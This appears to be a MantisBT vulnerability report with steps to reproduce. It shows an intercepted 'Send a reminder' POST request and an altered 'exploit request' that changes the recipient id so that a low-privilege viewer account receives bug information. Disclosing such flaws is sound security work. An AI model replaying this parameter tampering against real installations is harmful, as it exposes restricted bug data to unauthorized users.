Steps To Reproduce |
-
Login as your admin account
-
Go to view.php?id=<SOME_BUG_ID>
-
You can see a Send a reminder button
-
Click it
-
It will redirect to bug_reminder_page.php?bug_id=<SOME_BUG_ID>
-
Open your intercept
-
Send it to someone on the list (This list is compose of developer/manager/admin)
You will get this request :
POST /mantisbt2/bug_reminder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/bug_reminder_page.php?bug_id=11
Cookie: MANTIS_collapse_settings=|profile:0; MANTIS_PROJECT_COOKIE=1; MANTIS_VIEW_ALL_COOKIE=2; PHPSESSID=fkhqb98jkjojoog0of5kp9vt2c; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=11%2C10%2C9%2C4%2C7%2C6%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_reminder_token=20200911Akplh5-HUbvUvWpH0OX0RmTxWjMKX3FD&bug_id=11&to%5B%5D=10&bugnote_text=
- Change the value of
to%5B%5D to your viewer account in my case my viewer id value is 4
Exploit request
POST /mantisbt2/bug_reminder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/bug_reminder_page.php?bug_id=11
Cookie: MANTIS_collapse_settings=|profile:0; MANTIS_PROJECT_COOKIE=1; MANTIS_VIEW_ALL_COOKIE=2; PHPSESSID=fkhqb98jkjojoog0of5kp9vt2c; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=11%2C10%2C9%2C4%2C7%2C6%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_reminder_token=20200911Akplh5-HUbvUvWpH0OX0RmTxWjMKX3FD&bug_id=11&to%5B%5D=4&bugnote_text=
Exploit response
|
---|